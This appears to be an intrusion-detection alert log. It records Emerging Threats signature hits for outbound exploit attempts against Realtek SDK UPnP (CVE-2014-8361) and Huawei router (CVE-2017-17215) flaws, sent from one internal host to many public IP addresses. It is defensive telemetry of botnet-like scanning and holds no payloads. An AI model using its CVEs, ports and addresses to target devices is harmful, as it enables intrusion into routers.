                                      07/20/24-23:01:43.058685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6042452869192.168.2.2346.141.217.184
                                      07/20/24-23:01:08.607816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4364452869192.168.2.2378.200.30.164
                                      07/20/24-23:01:42.608153TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23739852869192.168.2.23143.66.245.70
                                      07/20/24-23:01:02.054387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357437215192.168.2.23221.165.24.130
                                      07/20/24-23:01:50.807258TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613299052869192.168.2.23212.5.145.192
                                      07/20/24-23:02:11.630112TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613711252869192.168.2.238.215.93.59
                                      07/20/24-23:01:47.006773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25553252869192.168.2.23116.238.28.166
                                      07/20/24-23:01:08.584506TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24256652869192.168.2.2349.39.36.55
                                      07/20/24-23:01:44.698984TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051252869192.168.2.23154.31.9.47
                                      07/20/24-23:01:31.976984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790637215192.168.2.2341.239.105.156
                                      07/20/24-23:01:41.404974TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4095852869192.168.2.2363.208.18.63
                                      07/20/24-23:01:48.108304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4339852869192.168.2.2391.225.198.252
                                      07/20/24-23:01:02.093903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169237215192.168.2.23155.230.89.206
                                      07/20/24-23:01:04.082384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449437215192.168.2.2341.28.46.127
                                      07/20/24-23:02:04.091867TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3694652869192.168.2.23153.43.82.157
                                      07/20/24-23:01:57.346494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6031452869192.168.2.23143.152.117.80
                                      07/20/24-23:01:56.265254TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3357852869192.168.2.23216.27.105.182
                                      07/20/24-23:01:57.313050TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5277652869192.168.2.23181.200.167.6
                                      07/20/24-23:01:25.948093TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614381052869192.168.2.23109.162.13.246
                                      07/20/24-23:01:00.640312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597237215192.168.2.23209.253.85.199
                                      07/20/24-23:01:09.081648TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24056452869192.168.2.23129.27.232.7
                                      07/20/24-23:01:08.563416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4669852869192.168.2.2336.193.87.124
                                      07/20/24-23:01:21.915268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486637215192.168.2.23157.246.199.209
                                      07/20/24-23:01:57.169212TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24466252869192.168.2.23155.107.33.68
                                      07/20/24-23:01:34.045143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103237215192.168.2.23157.12.69.99
                                      07/20/24-23:01:13.649188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5191452869192.168.2.23205.132.5.218
                                      07/20/24-23:01:59.992284TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24764452869192.168.2.23161.136.114.82
                                      07/20/24-23:01:48.255782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4163052869192.168.2.23146.185.97.186
                                      07/20/24-23:01:04.624022TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613767852869192.168.2.23104.75.200.235
                                      07/20/24-23:01:45.511523TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24190852869192.168.2.23169.97.165.219
                                      07/20/24-23:01:48.191657TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3967652869192.168.2.23195.166.157.114
                                      07/20/24-23:01:08.672944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6084652869192.168.2.23140.186.145.164
                                      07/20/24-23:01:24.929013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385637215192.168.2.2341.149.70.228
                                      07/20/24-23:01:40.355589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778437215192.168.2.23197.66.63.246
                                      07/20/24-23:01:42.703494TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24683652869192.168.2.23130.201.79.70
                                      07/20/24-23:01:08.611391TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24964452869192.168.2.2354.68.100.131
                                      07/20/24-23:01:11.634372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085237215192.168.2.23197.128.60.5
                                      07/20/24-23:01:45.108909TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5600852869192.168.2.2363.138.19.167
                                      07/20/24-23:01:24.904906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830237215192.168.2.2371.233.58.215
                                      07/20/24-23:01:03.426187TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3601252869192.168.2.23205.187.52.139
                                      07/20/24-23:01:40.334452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967437215192.168.2.23197.22.225.39
                                      07/20/24-23:01:06.994337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572237215192.168.2.2341.219.238.149
                                      07/20/24-23:02:02.476638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3750452869192.168.2.2353.255.54.255
                                      07/20/24-23:01:24.889164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894037215192.168.2.23157.24.252.54
                                      07/20/24-23:01:31.311906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5873052869192.168.2.2359.198.200.174
                                      07/20/24-23:01:01.453951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614250252869192.168.2.23155.42.58.223
                                      07/20/24-23:01:41.912337TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613642452869192.168.2.2332.146.19.98
                                      07/20/24-23:02:05.506482TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5995852869192.168.2.2362.219.153.144
                                      07/20/24-23:01:47.693711TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5061052869192.168.2.23203.201.27.61
                                      07/20/24-23:01:44.631448TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3452652869192.168.2.23133.122.43.145
                                      07/20/24-23:01:46.556921TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613993452869192.168.2.23190.183.92.200
                                      07/20/24-23:01:11.642449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519237215192.168.2.23157.196.130.183
                                      07/20/24-23:01:20.131339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086637215192.168.2.2341.20.237.244
                                      07/20/24-23:01:31.313163TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25967452869192.168.2.23108.240.199.7
                                      07/20/24-23:01:42.530468TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24906652869192.168.2.23164.43.137.199
                                      07/20/24-23:01:34.044717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421237215192.168.2.23197.171.121.26
                                      07/20/24-23:01:20.152427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416437215192.168.2.23197.173.190.17
                                      07/20/24-23:01:42.696197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614162052869192.168.2.23174.232.185.220
                                      07/20/24-23:01:08.598416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23310852869192.168.2.234.72.134.93
                                      07/20/24-23:01:44.156178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5833052869192.168.2.23221.223.71.222
                                      07/20/24-23:01:00.648489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653637215192.168.2.23157.118.19.128
                                      07/20/24-23:01:14.140178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5775652869192.168.2.2387.178.133.43
                                      07/20/24-23:01:41.501891TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614677052869192.168.2.232.78.155.76
                                      07/20/24-23:01:57.886795TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25133852869192.168.2.23194.242.148.126
                                      07/20/24-23:01:40.311124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3895437215192.168.2.23157.26.5.201
                                      07/20/24-23:01:06.989167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094437215192.168.2.23197.87.44.29
                                      07/20/24-23:02:02.387600TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4751652869192.168.2.23119.168.200.153
                                      07/20/24-23:01:11.641686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362637215192.168.2.2341.162.241.10
                                      07/20/24-23:01:20.124696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910437215192.168.2.2341.163.165.19
                                      07/20/24-23:01:31.331820TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614832852869192.168.2.23172.14.168.150
                                      07/20/24-23:01:48.547161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5982052869192.168.2.23129.246.142.35
                                      07/20/24-23:01:20.202325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968637215192.168.2.23119.225.217.146
                                      07/20/24-23:01:42.165780TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25770652869192.168.2.23160.40.68.243
                                      07/20/24-23:01:45.540580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4900452869192.168.2.23204.255.198.47
                                      07/20/24-23:01:34.048825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065237215192.168.2.23157.46.74.240
                                      07/20/24-23:01:42.790680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615302852869192.168.2.23189.193.210.39
                                      07/20/24-23:01:52.838689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5567452869192.168.2.23136.248.242.20
                                      07/20/24-23:02:01.681802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24988852869192.168.2.23190.157.219.101
                                      07/20/24-23:01:20.202325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083037215192.168.2.23197.39.102.71
                                      07/20/24-23:01:42.717611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863452869192.168.2.23163.215.30.136
                                      07/20/24-23:01:41.867104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3728852869192.168.2.23108.137.226.148
                                      07/20/24-23:01:42.401855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4001252869192.168.2.2353.176.94.191
                                      07/20/24-23:01:31.974782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885037215192.168.2.23197.86.232.67
                                      07/20/24-23:01:41.608574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5552452869192.168.2.23208.24.233.14
                                      07/20/24-23:01:52.053251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3323652869192.168.2.2365.82.234.209
                                      07/20/24-23:01:43.135089TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615744452869192.168.2.239.44.236.192
                                      07/20/24-23:01:41.407067TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662252869192.168.2.2378.5.59.56
                                      07/20/24-23:01:32.027082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930837215192.168.2.23139.146.7.44
                                      07/20/24-23:01:08.584507TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23596052869192.168.2.238.98.158.174
                                      07/20/24-23:01:08.563416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23787452869192.168.2.23126.16.187.60
                                      07/20/24-23:01:31.979565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583237215192.168.2.23157.183.175.156
                                      07/20/24-23:01:31.322110TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25198452869192.168.2.2371.185.104.236
                                      07/20/24-23:01:42.647416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615841852869192.168.2.2391.15.191.58
                                      07/20/24-23:01:42.357440TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5616452869192.168.2.2342.7.66.220
                                      07/20/24-23:01:45.109957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694052869192.168.2.2389.230.177.62
                                      07/20/24-23:01:42.580745TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24254252869192.168.2.231.216.69.165
                                      07/20/24-23:01:45.432263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4686652869192.168.2.23110.45.133.89
                                      07/20/24-23:02:20.036130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614345852869192.168.2.2338.132.172.199
                                      07/20/24-23:01:42.508021TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23413252869192.168.2.23100.224.33.210
                                      07/20/24-23:01:05.010861TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615864652869192.168.2.2370.148.71.209
                                      07/20/24-23:01:41.295497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3667852869192.168.2.2358.43.60.192
                                      07/20/24-23:01:27.650643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544237215192.168.2.23157.62.33.47
                                      07/20/24-23:01:31.977603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396637215192.168.2.23157.46.234.94
                                      07/20/24-23:01:08.575986TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23464052869192.168.2.2325.158.237.150
                                      07/20/24-23:01:41.258056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4045652869192.168.2.2396.234.113.72
                                      07/20/24-23:01:47.872561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24532852869192.168.2.2384.198.11.250
                                      07/20/24-23:01:02.236183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614849452869192.168.2.23124.144.192.144
                                      07/20/24-23:01:24.915904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5564037215192.168.2.23197.169.84.58
                                      07/20/24-23:01:47.818739TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614976652869192.168.2.2367.31.108.66
                                      07/20/24-23:01:34.048825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379237215192.168.2.23157.199.109.79
                                      07/20/24-23:01:49.277117TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615884652869192.168.2.23216.9.135.122
                                      07/20/24-23:01:51.879276TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26016252869192.168.2.2313.31.40.78
                                      07/20/24-23:01:54.930155TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24016052869192.168.2.23197.213.222.122
                                      07/20/24-23:01:42.619336TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613707652869192.168.2.2340.50.75.236
                                      07/20/24-23:01:57.313050TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24881252869192.168.2.23187.4.24.206
                                      07/20/24-23:01:42.636583TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614365252869192.168.2.23167.4.219.92
                                      07/20/24-23:01:27.654172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615437215192.168.2.2341.20.72.212
                                      07/20/24-23:01:44.280820TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613787452869192.168.2.23123.227.205.159
                                      07/20/24-23:01:08.594120TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24350052869192.168.2.23173.195.200.196
                                      07/20/24-23:01:27.664887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815037215192.168.2.23197.146.248.19
                                      07/20/24-23:01:49.578308TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24279052869192.168.2.2337.20.218.143
                                      07/20/24-23:01:03.299761TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6024652869192.168.2.2340.55.203.85
                                      07/20/24-23:01:43.946478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615114852869192.168.2.23108.216.198.203
                                      07/20/24-23:01:42.623848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5757852869192.168.2.2396.213.123.243
                                      07/20/24-23:01:51.060408TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24476852869192.168.2.23158.244.111.55
                                      07/20/24-23:01:20.149798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845637215192.168.2.23157.163.36.247
                                      07/20/24-23:01:43.607934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25982252869192.168.2.23160.195.41.193
                                      07/20/24-23:01:45.484487TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5174652869192.168.2.23182.81.116.37
                                      07/20/24-23:01:14.000556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3877252869192.168.2.23157.5.72.210
                                      07/20/24-23:02:20.036130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3951652869192.168.2.23131.18.19.96
                                      07/20/24-23:01:06.973541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325237215192.168.2.23118.232.12.90
                                      07/20/24-23:01:14.090830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368037215192.168.2.23197.93.60.57
                                      07/20/24-23:01:02.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4254237215192.168.2.23157.219.32.62
                                      07/20/24-23:01:48.958887TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24312252869192.168.2.23110.158.170.123
                                      07/20/24-23:01:00.637175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990637215192.168.2.23140.34.44.126
                                      07/20/24-23:01:59.302806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3843252869192.168.2.23217.255.162.70
                                      07/20/24-23:01:14.049603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585437215192.168.2.23157.40.222.217
                                      07/20/24-23:00:59.203960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954437215192.168.2.2341.37.144.8
                                      07/20/24-23:01:46.261793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3926652869192.168.2.23137.133.156.16
                                      07/20/24-23:01:59.745622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4197852869192.168.2.23144.252.195.82
                                      07/20/24-23:01:42.928503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3599052869192.168.2.23202.8.238.183
                                      07/20/24-23:01:24.459589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4327252869192.168.2.23179.40.74.15
                                      07/20/24-23:01:31.986571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195837215192.168.2.23157.195.52.119
                                      07/20/24-23:01:04.050503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228237215192.168.2.2341.149.9.235
                                      07/20/24-23:01:41.353334TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613901252869192.168.2.23197.85.104.215
                                      07/20/24-23:01:07.016889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668437215192.168.2.23197.53.90.124
                                      07/20/24-23:01:34.044417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886437215192.168.2.23157.83.163.2
                                      07/20/24-23:01:47.987185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3410652869192.168.2.23140.138.195.141
                                      07/20/24-23:01:41.699842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5761452869192.168.2.2370.95.192.176
                                      07/20/24-23:01:41.494999TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4417252869192.168.2.23219.196.203.133
                                      07/20/24-23:01:00.639093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315837215192.168.2.23197.197.73.14
                                      07/20/24-23:01:07.082045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921437215192.168.2.2334.4.8.9
                                      07/20/24-23:01:43.110964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4654052869192.168.2.2398.147.36.143
                                      07/20/24-23:01:02.117244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613579852869192.168.2.23207.30.132.8
                                      07/20/24-23:01:01.901550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3351852869192.168.2.2327.130.132.139
                                      07/20/24-23:01:41.295718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5126652869192.168.2.2314.249.111.18
                                      07/20/24-23:01:41.279073TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5764452869192.168.2.23122.124.32.89
                                      07/20/24-23:01:42.250039TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25555852869192.168.2.23220.17.179.230
                                      07/20/24-23:01:46.871315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4742252869192.168.2.23196.221.214.48
                                      07/20/24-23:01:53.581574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5592652869192.168.2.2393.94.222.156
                                      07/20/24-23:01:02.355712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3349452869192.168.2.23196.0.98.90
                                      07/20/24-23:01:45.713934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3761052869192.168.2.2390.150.161.105
                                      07/20/24-23:01:59.356106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615020652869192.168.2.2337.84.136.136
                                      07/20/24-23:01:42.131607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615022852869192.168.2.23172.233.108.76
                                      07/20/24-23:01:40.334452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135037215192.168.2.23137.161.38.152
                                      07/20/24-23:01:01.189596TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614934852869192.168.2.23131.199.217.59
                                      07/20/24-23:01:24.884598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521837215192.168.2.2398.114.190.226
                                      07/20/24-23:01:42.809716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615555852869192.168.2.23200.107.251.119
                                      07/20/24-23:02:02.291967TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5704252869192.168.2.23135.85.2.136
                                      07/20/24-23:01:20.150638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376437215192.168.2.2347.210.130.207
                                      07/20/24-23:01:00.636533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966637215192.168.2.23197.28.251.253
                                      07/20/24-23:01:00.641498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106237215192.168.2.23197.12.203.6
                                      07/20/24-23:01:14.203011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5224437215192.168.2.23157.84.128.158
                                      07/20/24-23:01:52.038834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4504852869192.168.2.2318.71.115.72
                                      07/20/24-23:02:11.703257TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5183652869192.168.2.23169.52.197.149
                                      07/20/24-23:01:08.683684TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25949052869192.168.2.23175.24.153.194
                                      07/20/24-23:01:12.806645TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24008052869192.168.2.23213.27.181.202
                                      07/20/24-23:01:01.437626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6014452869192.168.2.23205.32.150.55
